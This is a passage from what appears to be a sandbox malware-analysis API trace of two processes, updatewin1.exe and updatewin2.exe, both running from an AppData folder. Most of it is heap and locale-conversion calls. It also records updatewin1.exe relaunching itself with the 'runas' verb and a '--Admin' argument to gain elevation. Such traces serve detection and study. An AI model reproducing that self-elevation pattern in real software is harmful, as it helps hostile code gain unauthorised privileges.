Flags=0x8, Size=0x48) returned 0x2cc788 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x52) returned 0x2cc7d8 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3c) returned 0x2cd888 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x82) returned 0x2cc838 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2b53b0 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1e) returned 0x2cbd60 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2c) returned 0x2b53e8 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x54) returned 0x2cc8c8 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x52) returned 0x2cc928 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2a) returned 0x2b5420 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3c) returned 0x2cd8d0 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x54) returned 0x2cc988 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2cc9e8 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2b5458 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x8c) returned 0x2cca18 [0129.567] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ccd08 | out: hHeap=0x2a0000) returned 1 [0129.567] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x800) returned 0x2ccab0 [0129.569] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.569] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0129.878] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.878] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" " [0129.878] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x2cd2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" [0129.878] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc0) returned 0x2cd388 [0129.879] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" [0129.879] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783") returned 1 [0129.879] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0129.879] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0130.546] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2cd388 | out: hHeap=0x2a0000) returned 1 [0130.546] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0130.546] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0130.546] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ca0d0 | out: hHeap=0x2a0000) returned 1 [0130.546] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ccab0 | out: hHeap=0x2a0000) returned 1 [0130.547] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.547] GetLastError () returned 0x57 [0130.547] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0130.547] ExitProcess (uExitCode=0x0) [0130.547] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ca9e8 | out: hHeap=0x2a0000) returned 1 [0130.549] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 116 os_tid = 0x644 Thread: id = 117 os_tid = 0x360 Thread: id = 118 os_tid = 0x824 Thread: id = 119 os_tid = 0x72c Process: id = "10" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe" page_root = "0x52a8b000" os_pid = "0x564" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xa80" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0x67c [0130.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x57f39310, dwHighDateTime=0x1d6bf06)) [0130.233] GetCurrentProcessId () returned 0x564 [0130.233] GetCurrentThreadId () returned 0x67c [0130.233] GetTickCount () returned 0x1153c46 [0130.233] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=25049818887) returned 1 [0130.234] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0130.234] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1d10000 [0130.235] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.235] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0130.235] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0130.235] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0130.236] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0130.236] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.236] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.237] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.237] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.237] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.237] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.238] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.238] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.238] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.239] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x214) returned 0x1d107d0 [0130.239] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.239] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.239] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.239] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.239] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.239] GetCurrentThreadId () returned 0x67c [0130.239] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0130.240] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x800) returned 0x1d109f0 [0130.240] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0130.240] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0130.240] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0130.240] SetHandleCount (uNumber=0x20) returned 0x20 [0130.240] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe\" " [0130.240] GetEnvironmentStringsW () returned 0x284e70* [0130.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0130.240] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x0, Size=0x565) returned 0x1d111f8 [0130.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1d111f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0130.240] FreeEnvironmentStringsW (penv=0x284e70) returned 1 [0130.240] GetLastError () returned 0x0 [0130.240] SetLastError (dwErrCode=0x0) [0130.240] GetLastError () returned 0x0 [0130.240] SetLastError (dwErrCode=0x0) [0130.240] GetLastError () returned 0x0 [0130.240] SetLastError (dwErrCode=0x0) [0130.240] GetACP () returned 0x4e4 [0130.240] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x0, Size=0x220) returned 0x1d11768 [0130.241] GetLastError () returned 0x0 [0130.241] SetLastError (dwErrCode=0x0) [0130.241] IsValidCodePage (CodePage=0x4e4) returned 1 [0130.241] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0130.241] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0130.241] GetLastError () returned 0x0 [0130.241] SetLastError (dwErrCode=0x0) [0130.241] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0130.241] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.241] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0130.241] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0130.241] GetLastError () returned 0x0 [0130.241] SetLastError (dwErrCode=0x0) [0130.241] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0130.241] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㠈艮㞅AĀ") returned 256 [0130.242] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㠈艮㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0130.242] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㠈艮㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0130.242] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\"\n=\x82\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.242] GetLastError () returned 0x0 [0130.242] SetLastError (dwErrCode=0x0) [0130.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㠈艮㞅AĀ") returned 256 [0130.242] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㠈艮㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0130.242] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㠈艮㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0130.242] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 